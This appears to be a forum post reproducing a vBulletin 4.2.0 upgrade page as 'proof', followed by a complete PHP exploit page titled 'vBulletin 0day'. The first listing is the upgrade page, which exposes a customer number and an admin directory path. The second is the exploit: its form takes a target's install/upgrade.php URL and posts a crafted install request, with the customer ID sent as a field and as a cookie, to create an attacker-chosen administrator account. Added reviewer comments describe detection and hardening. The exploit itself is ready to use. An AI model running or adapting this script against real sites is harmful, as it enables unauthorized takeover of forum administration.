proof:
Code:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!--
  Reviewer note: this first listing is the HTML returned by a vBulletin 4.2.0
  install/upgrade.php, posted as "proof". In this state every panel carries
  class "hidden" except #authenticate, the customer-number prompt, so this is
  what a visitor receives before entering any credential. Everything below,
  including the inline script constants, is readable by that visitor.
  Hardening: remove the install directory, or deny access to it at the web
  server, once an install or upgrade has finished.
-->
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
<meta http-equiv="Expires" content="Sat, 26 Jul 1997 05:00:00 GMT" />
<meta http-equiv="Pragma" content="no-cache, must-revalidate" />
<title>vBulletin 4.2.0 Upgrade System </title>
<link rel="stylesheet" href="../cpstyles/vBulletin_3_Silver/controlpanel.css" />
<style type="text/css">
body { margin:0; }
#vb_overlay_background { opacity:0.50; -moz-opacity:0.50; filter:alpha(opacity=50); background-color:#000000; z-index:10; position:fixed; top:0px; left:0px; width:100%; height:100%; }
#header { border:outset 2px; display:block; padding:5px; }
.floatcontainer:after { content: "."; display: block; height: 0; clear: both; visibility: hidden; }
.floatcontainer { display:inline-block; }
/* IE-Mac hide \*/
* html .floatcontainer { height:1%; }
.floatcontainer { display:block; }
.floatcontainer.hidden { display:none; }
/* End IE-Mac hide */
#header div.logo { width:160px; float:left; }
#header div.notice { padding-left:220px; padding-top:18px; }
#header div.xml1 { float:right; text-align:right; padding-top:5px; }
#header div.xml2 { float:right; text-align:left; padding-top:5px; padding-right:10px; margin-left:15px; }
#header div.xml1 ul, #header div.xml2 ul { list-style-type:none; margin:0; padding:0; font-size: 11px; font-family: tahoma, verdana, arial, helvetica, sans-serif; }
#all { margin: 10px; }
#all p, #all td, #all li, #all div { font-size: 11px; font-family: verdana, arial, helvetica, sans-serif; }
#confirm, #prompt { z-index:11; position:absolute; }
#prompt div.input { display:block; }
#progressbox, #mismatch, #authenticate, #prompt, #confirm, #startup_errors { width:375px; text-align:center; margin-left:auto; margin-right:auto; margin-top:20px; }
#startup_errors { overflow:hidden; max-height:400px; _height:400px; }
#startup_errors .messagebody { text-align:left; padding:10px; overflow:auto; max-height:330px; _height:330px; }
#startup_errors form { margin:0; padding:5px; }
#startup_errors input[type="submit"] { margin:0; }
#startup_errors li img { width:0; }
#promptmessage, #confirmmessage { padding:10px; text-align:left; overflow:auto; max-height:400px; }
#progresssection .buttons { text-align:left; }
.messageheader { padding:5px; font-weight:bold; text-align:center; }
.submit, .messagebody { padding:5px; }
.advancedconfirmbody { padding-left:10px; padding-right:10px; }
.advancedconfirm .messagebody{ padding:0; }
.advancedconfirm #confirmmessage { padding:0; }
.list_no_decoration { list-style-type:none; margin:0px; padding:0px; }
#detailbox { margin: 20px auto; width:375px; }
#promptresponse { width:90%; }
#customerid { width:250px; font-weight:bold; display:block; margin:10px auto 0 auto; }
#customerid_error { margin:10px 0; padding:3px; }
input[type="submit"] { margin-top:10px; }
#mainmessage { height:300px; overflow:auto; padding-bottom:10px; }
#mainmessage > ul > li { margin-left:25px; text-indent:-25px; }
#mainmessage > ul > li ol, #mainmessage > ul > li.noindent { margin-left:0; text-indent:0; }
#mainmessage li.querystatus {}
#upgradeprogress { margin-right:10px; margin-top:4px; float:right; vertical-align:middle; }
#progressbar_container { border:1px outset; height:16px; width:95%; margin:10px auto; background-color:#FFFFFF; text-align:left; }
#progressbar { width:0; height:15px; padding-top:1px; background-color:#CCCCCC; text-align:right; overflow:auto; float:left; }
#progressbar span { margin-right: 2px; }
#percentageout { margin-left: 2px; padding-top:1px; float:left; }
#showdetails, #hidedetails { margin-left: 7px; }
#beginsection { #padding-bottom:10px; }
#confirmform, #promptform { padding:0; margin:0; }
#optionsbox { text-align:left }
/* The .hidden class is what keeps every panel except #authenticate out of view in this capture. */
.hidden { display:none; }
.usererror { display:block; color:red; }
.usererror.hidden { display:none; }
.lbinstallselect { max-width:180px; _width:180px; }
div.consolemsg { text-align:left; padding:10px; }
div.consolemsg ul li { font-weight:bold; list-style-type:none; }
}
</style>
<script type="text/javascript">
<!--
var IMGDIR_MISC = "../cpstyles/vBulletin_3_Silver";
var CLEARGIFURL = "./clear.gif";
// Reviewer note: CUSTNUMBER (a 32-hex-character value) is written into the page
// while the only visible panel is the customer-number prompt. The second listing
// on this page sends a caller-supplied customer ID as the "customerid" field and
// as a "bbcustomerid" cookie. NOTE(review): if upgrade.php compares that input
// against this value, the prompt authenticates nothing; upgrade.php itself is
// not shown here, so confirm there.
var CUSTNUMBER = "a0ec1a9dca589d3b988311afaa570d29";
var VERSION = "";
var SCRIPTINFO = { version: "", startat: "", step : "", only : "" };
// Also discloses the relative path of the admin control panel directory.
var ADMINDIR = "../bossflight";
var TOTALSTEPS = 0;
var ABORTMSG = "Status: Aborted";
var UNEXPECTED_TEXT = "<strong>Unexpected Text:</strong><pre>%1$s</pre>";
var SETUPTYPE = "upgrade";
var STEP_X_Y = "Step %1$s - %2$s";
var SERVER_NO_RESPONSE = "The server returned no response. This is probably due to a timeout setting. Please contact vBulletin Support for assistance";
//-->
</script>
<script type="text/javascript" src="../clientscript/yui/yuiloader-dom-event/yuiloader-dom-event.js"></script>
<script type="text/javascript" src="../clientscript/yui/connection/connection-min.js"></script>
<script type="text/javascript" src="../clientscript/vbulletin-core.js"></script>
</head>
<body>
<div id="vb_overlay_background" class="hidden"></div>
<!-- Header: product version and the versions of the bundled XML data files. -->
<div id="header" class="navbody floatcontainer">
  <div class="xml2">
    <ul>
      <li id="vb_style_version">4.2.0</li>
      <li id="vb_mobile_style_version">4.2.0</li>
      <li id="vb_settings_version">4.2.0</li>
      <li id="vb_language_version">4.2.0</li>
      <li id="vb_navigation_version">4.2.0</li>
      <li id="vb_admin_help_version">4.2.0</li>
    </ul>
  </div>
  <div class="xml1">
    <ul>
      <li>vbulletin-style.xml:</li>
      <li>vbulletin-mobile-style.xml:</li>
      <li>vbulletin-settings.xml:</li>
      <li>vbulletin-language.xml:</li>
      <li>vbulletin-navigation.xml:</li>
      <li>vbulletin-adminhelp.xml:</li>
    </ul>
  </div>
  <div class="logo">
    <img src="../cpstyles/vBulletin_3_Silver/cp_logo.gif" alt="" title="vBulletin 4 © 2013 vBulletin Solutions, Inc. All rights reserved." />
  </div>
  <div class="notice">
    <strong>vBulletin <span id="vb_version">4.2.0</span> Upgrade System</strong><br />
    (Please be patient as some parts may take some time)
  </div>
</div>
<div id="all">
  <div class="tborder hidden" id="startup_errors">
    <div class="navbody messageheader">Startup Errors</div>
    <div class="messagebody logincontrols">
      Due to the following errors, the install/upgrade can not continue:
      <ul>
        <li class="hidden"></li>
      </ul>
    </div>
    <form action="upgrade.php" method="post" id="submitconfirmform" class="status hidden">
      <input class="button" type="submit" name="submit" tabindex="1" accesskey="s" id="submitconfirmok" value="Ignore and Continue" />
    </form>
  </div>
  <!-- The one panel without class "hidden": the customer number is the only credential this page asks for. -->
  <div class="tborder" id="authenticate">
    <div class="navbody messageheader">Please Enter Your Customer Number</div>
    <div class="messagebody logincontrols">
      This is the number with which you log in to the vBulletin.com Members' Area
      <form action="upgrade.php" method="post">
        <input type="text" tabindex="1" value="" name="customerid" id="customerid" />
        <input class="button" type="submit" tabindex="1" accesskey="s" id="authsubmit" value="Enter Upgrade System" />
        <input type="hidden" name="step" value="0" />
        <input type="hidden" name="startat" value="0" />
        <input type="hidden" name="only" value="0" />
      </form>
    </div>
  </div>
  <div class="tborder hidden" id="mismatch">
    <div class="navbody messageheader">Version Mismatch</div>
    <div class="messagebody logincontrols">
      Your upgrade log shows that your last upgrade was to version but you are currently on version 4.2.0.
      <form action="upgrade.php" method="post">
        <input type="hidden" name="mismatch" value="1" />
        <label for="version1"><input id="version1" type="radio" name="version" value="" />Upgrade from </label>
        <label for="version2"><input id="version2" type="radio" name="version" value="4.2.0" />Upgrade from 4.2.0</label>
        <input class="button" type="submit" tabindex="1" accesskey="s" name="" value="Enter Upgrade System" />
        <input type="hidden" name="step" value="0" />
        <input type="hidden" name="startat" value="0" />
        <input type="hidden" name="only" value="0" />
      </form>
    </div>
  </div>
  <!-- Progress, options, prompt and confirm panels follow; all are hidden in this capture. -->
  <div class="tborder hidden" id="progressbox">
    <div class="navbody messageheader"></div>
    <div class="messagebody logincontrols">
      <div class="hidden" id="progresssection">
        <div id="progressmessage"></div>
        <div id="progressbar_container">
          <div id="progressbar"></div>
          <div id="percentageout"></div>
        </div>
        <div id="progressnotice"></div>
        <div class="buttons floatcontainer">
          <img id="upgradeprogress" class="hidden" src="../cpstyles/vBulletin_3_Silver/progress.gif" alt="" />
          <input class="button" type="button" id="showdetails" tabindex="1" name="" value="Show Details" />
          <input class="button hidden" type="button" id="hidedetails" tabindex="1" name="" value="Hide Details" />
          <input class="button hidden" type="button" id="admincp" tabindex="1" name="" value="Admin CP" />
          <input class="button hidden" type="button" id="querystatus" tabindex="1" name="" value="Query Status" />
        </div>
      </div>
      <div id="beginsection">
        <form action="upgrade.php" id="optionsform" method="post">
          <p></p>
          <input type="hidden" name="jsfail" value="1" />
          <div class="hidden" id="optionsbox">
            <table cellspacing="0" cellpadding="4" border="0" align="center" width="100%" id="cpform_table" class="" style="border-collapse: separate;">
              <tbody>
                <tr>
                  <td class="alt1"> Merge Template Updates </td>
                  <td class="alt1"> Yes <input id="rb_merge1" type="radio" name="options[skiptemplatemerge]" value="0" checked="checked" /> No <input id="rb_merge2" type="radio" name="options[skiptemplatemerge]" value="1" /> </td>
                </tr>
              </tbody>
            </table>
          </div>
          <input class="button" type="submit" id="beginupgrade" tabindex="1" name="" value="" />
          <input class="button" type="submit" id="options" tabindex ="2" name="" value="Options" />
        </form>
      </div>
    </div>
  </div>
  <div id="detailbox" class="tborder hidden">
    <div class="navbody messageheader"></div>
    <div id="mainmessage" class="messagebody logincontrols"></div>
    <div class="status"> <span id="statusmessage"></span> </div>
  </div>
  <div class="tborder hidden" id="prompt">
    <div class="navbody messageheader" id="prompttitle">Action Required</div>
    <div class="messagebody logincontrols">
      <div id="promptmessage"></div>
      <form action="upgrade.php" method="post" id="promptform">
        <input type="text" tabindex="1" value="" name="promptresponse" id="promptresponse" />
        <div class="submit">
          <input class="button" type="submit" name="submit" tabindex="1" accesskey="s" id="promptsubmit" value="OK" />
          <input class="button hidden" type="reset" name="reset" tabindex="1" id="promptreset" value="Reset" />
          <input class="button hidden" type="submit" name="submit" tabindex="1" accesskey="s" id="promptcancel" value="Cancel" />
        </div>
      </form>
    </div>
  </div>
  <div class="tborder hidden" id="confirm">
    <div class="navbody messageheader" id="confirmtitle">Action Required</div>
    <div class="messagebody logincontrols">
      <form action="upgrade.php" method="post" id="confirmform">
        <div id="confirmmessage"></div>
        <div class="submit">
          <input class="button" type="submit" name="submit" tabindex="1" accesskey="s" id="confirmok" value="OK" />
          <input class="button hidden" type="reset" name="reset" tabindex="1" id="confirmreset" value="Reset" />
          <input class="button" type="button" name="cancel" tabindex="1" accesskey="s" id="confirmcancel" value="Cancel" />
        </div>
      </form>
    </div>
  </div>
</div>
<p align="center"><a href="http://www.vbulletin.com/" target="_blank" class="copyright"> vBulletin v4.2.0, Copyright © 2013 vBulletin Solutions, Inc. All rights reserved. </a></p>
<script type="text/javascript" src="vbulletin-upgrade.js"></script>
</body>
</html>
Code:
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<!--
  Reviewer note: second listing, a PHP page that relays one POST request to a
  vBulletin install/upgrade.php URL typed into its form. It is annotated here
  for detection and mitigation. The request can only reach upgrade.php while
  the install directory is still deployed and reachable, so removing or
  access-restricting that directory after install/upgrade closes the path.
-->
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>vBulletin 0day</title>
<style type="text/css">
<!--
body { background-color: #000; text-align: center; color: #063; font-size: large; }
.a { font-size: 24px; }
.f { color: #060; }
.gbf { color: #F00; }
.dd { color: #F00; }
.w { font-size: large; }
a:link { text-decoration: none; }
a:visited { text-decoration: none; }
a:hover { text-decoration: none; }
a:active { text-decoration: none; }
-->
</style></head><body>
<p class="a">
<h1><span class="gbf">vBulletin</span> 4.x.x and 5.x.x Upgrade 0day Exploit</h1>
<br>Created by: 1337
<br>Found on: 08/22/2013
<br>Website: http://www.madleets.com
</p>
<br>
<?php
//extract data from the post
// Runs only when the form further down was submitted (its submit control is named "submit").
if(isset($_POST['submit'])){
  // NOTE(review): extract() copies every POST key into a local variable; the
  // code below still reads its inputs from $_POST directly.
  extract($_POST);
  //set POST variables
  $url = $_POST['url'];
  // Body of the relayed request. The fixed values (version=install, step=7,
  // response=yes, htmlsubmit=1) together with the htmldata[...] account fields
  // are what request-body logging or a WAF rule on install/upgrade.php can
  // match on.
  $fields = array(
    'ajax' => urlencode('1'),
    'version' => urlencode('install'),
    'checktable' => urlencode('false'),
    'firstrun' => urlencode('false'),
    'step' => urlencode('7'),
    'startat' => urlencode('0'),
    'only' => urlencode('false'),
    'customerid' => urlencode($_POST['customerid']),
    'options[skiptemplatemerge]' => urlencode('0'),
    'response' => urlencode('yes'),
    'htmlsubmit' => urlencode('1'),
    'htmldata[username]' => urlencode($_POST['username']),
    'htmldata[password]' => urlencode($_POST['password']),
    'htmldata[confirmpassword]' => urlencode($_POST['password']),
    'htmldata[email]' => urlencode($_POST['email'])
  );
  //url-ify the data for the POST
  foreach($fields as $key=>$value) { $fields_string .= $key.'='.$value.'&'; }
  rtrim($fields_string, '&');
  //open connection
  $ch = curl_init();
  //set the url, number of POST vars, POST data
  curl_setopt($ch,CURLOPT_URL, $url);
  curl_setopt($ch,CURLOPT_POST, count($fields));
  curl_setopt($ch,CURLOPT_POSTFIELDS, $fields_string);
  curl_setopt($ch, CURLOPT_COOKIESESSION, TRUE);
  // The customer ID travels twice: as the customerid field above and as this
  // bbcustomerid cookie. A bbcustomerid cookie on a request to upgrade.php from
  // an address that is not an administrator's is a further log indicator.
  curl_setopt($ch, CURLOPT_COOKIE, 'bbcustomerid='.$_POST['customerid'] );
  //execute post
  $result = curl_exec($ch);
  //close connection
  curl_close($ch);
  exit();
}
?>
<!--
  Operator form feeding the PHP block above. The button label "Inject Admin"
  suggests the goal is an administrator account created with the supplied
  username, password and email. Where an install directory was left exposed,
  review the administrator list for accounts nobody on the team created.
-->
<center>
<form name="sploit" method="POST" action="<?php echo $_SERVER['REQUEST_URI']; ?>">
<span>Example:http://rubycalaber.com/forum/install/upgrade.php</span><br>
<span>Website:</span> <input name="url" type="text" tabindex="1" size="60" /> <br>
<span>Customer ID:</span> <input name="customerid" type="text" tabindex="2" size="40" /> <br>
<span>Username:</span> <input name="username" type="text" tabindex="3" size="40" /> <br>
<span>Password:</span> <input name="password" type="text" tabindex="4" size="40" /> <br>
<span>Email:</span> <input name="email" type="text" tabindex="5" maxlength="40" />
<input name="submit" type="submit" value="Inject Admin">
</form>
</center>
<p class="a">------------------------------------------------------------------------------------------------------------------</p>
<p class="a">MaDLeeTs TeaM </p>
<p class="a">------------------------------------------------------------------------------------------------------------------</p>
</div> </pre>
<p class="a"> </p>
<p align="center">
</body></html>
![]()
09-16-2013
Last edited by m0nde; 09-16-2013 at 01:05 PM.